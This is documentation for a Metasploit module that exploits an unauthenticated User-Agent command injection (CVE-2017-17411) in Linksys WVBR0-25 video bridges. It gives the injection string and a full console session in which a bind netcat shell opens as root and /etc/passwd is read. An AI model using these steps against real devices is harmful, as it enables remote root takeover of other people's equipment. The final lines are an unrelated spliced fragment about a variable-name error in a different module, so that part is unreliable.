This module is for exploiting vulnerable Linksys WVBR0-25 wireless video bridges using CVE-2017-17411. The vuln in question involves a command injection due to improper sanitization of the User-Agent header. The module makes an initial GET request to the root of the web server and checks the result for a vulnerable firmware version. If vulnerable, it makes a subsequent GET request with the User-Agent set to `";<payload> #`. This can be verified against WVBR0-25 devices running firmware < 1.0.41.
Example console output:
```
msf > use exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > info
Name: Linksys WVBR0-25 User-Agent Command Execution
Module: exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth
Platform: Unix
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2017-12-13
Provided by:
HeadlessZeke
Available targets:
Id Name
-- ----
0 Automatic
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST yes The target address
RPORT 80 yes The target port
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Payload information:
Space: 1024
Description:
The Linksys WVBR0-25 Wireless Video Bridge, used by DirecTV to
connect wireless Genie cable boxes to the Genie DVR, is vulnerable
to OS command injection in version < 1.0.41 of the web management
portal via the User-Agent header. Authentication is not required to
exploit this vulnerability.
References:
http://cvedetails.com/cve/2017-17411/http://www.zerodayinitiative.com/advisories/ZDI-17-973https://www.thezdi.com/blog/2017/12/13/remote-root-in-directvs-wireless-video-bridge-a-tale-of-rage-and-despair
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
cmd/unix/bind_netcat normal Unix Command Shell, Bind TCP (via netcat)
cmd/unix/generic normal Unix Command, Generic Command Execution
cmd/unix/reverse_netcat normal Unix Command Shell, Reverse TCP (via netcat)
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set payload cmd/unix/bind_netcat
payload => cmd/unix/bind_netcat
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set RHOST 10.0.0.104
RHOST => 10.0.0.104
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > exploit
[*] 10.0.0.104:80 - Trying to access the device ...
[*] Started bind handler
[*] 10.0.0.104:80 - Exploiting...
[*] Command shell session 1 opened (10.0.0.109:40541 -> 10.0.0.104:4444) at 2017-12-21 17:09:54 -0600
id
uid=0(root) gid=0(root)
^C
Abort session 1? [y/N] y
[*] 10.0.0.104 - Command shell session 1 closed. Reason: User exit
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set payload cmd/unix/generic
payload => cmd/unix/generic
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set cmd cat /etc/passwd
cmd => cat /etc/passwd
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > exploit
[*] 10.0.0.104:80 - Trying to access the device ...
[*] 10.0.0.104:80 - Exploiting...
[+] 10.0.0.104:80 - Command sent successfully
[*] 10.0.0.104:80 - Command output: root:x:0:0::/:/bin/sh nobody:x:99:99:Nobody:/:/bin/nologin sshd:x:22:22::/var/empty:/sbin/nologin admin:x:1000:1000:Admin User:/tmp/home/admin:/bin/sh quagga:x:1001:1001:Quagga
[*] Exploit completed, but no session was created.
msf exploit(linksys_wvbr0_user_agent_exec_noauth) >
```
Variable on line 67 needs to be changed to "user" from "username" which was undefined and causing error during exploit execution.
[-] Exploit failed: NameError undefined local variable or method `username' for #<Msf::Modules::Mod6578706c6f69742f756e69782f7765626170702f77705f736c69646573686f7767616c6c6572795f75706c6f6164::MetasploitModule:0x0055c61ab093f8>
After changing the incorrect variable name from "username" to "user", the exploit completes.
HD Moore